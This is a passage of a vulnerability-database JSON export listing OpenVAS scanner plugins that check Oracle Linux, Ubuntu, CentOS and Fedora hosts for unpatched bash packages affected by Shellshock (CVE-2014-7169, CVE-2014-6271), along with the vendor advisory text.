value:\"http://linux.oracle.com/errata/ELSA-2014-3077.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1.0.1\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:44", "description": "Oracle Linux Local Security Checks ELSA-2014-3075", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3075", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123302", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3075.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123302\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3075\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3075 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3075\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3075.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1.0.1\", 
rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841986", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841986\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:26 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-2\");\n script_tag(name:\"insight\", value:\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch\nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS\npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. 
(CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-2/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "description": "Oracle Linux Local Security Checks ELSA-2014-3076", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3076.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux 
Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123300\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3076\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3076 - bash security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3076\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3076.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882033", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882033\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:17 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). 
Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020591.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_10.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the 'bash' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11514", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868211", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11514\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868211\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:18 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11514\");\n script_tag(name:\"affected\", value:\"bash on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the 'bash' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:55 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos7\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. 
For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882031", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882031\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:09 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos6\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. 
For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:22", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169\n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310703035", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
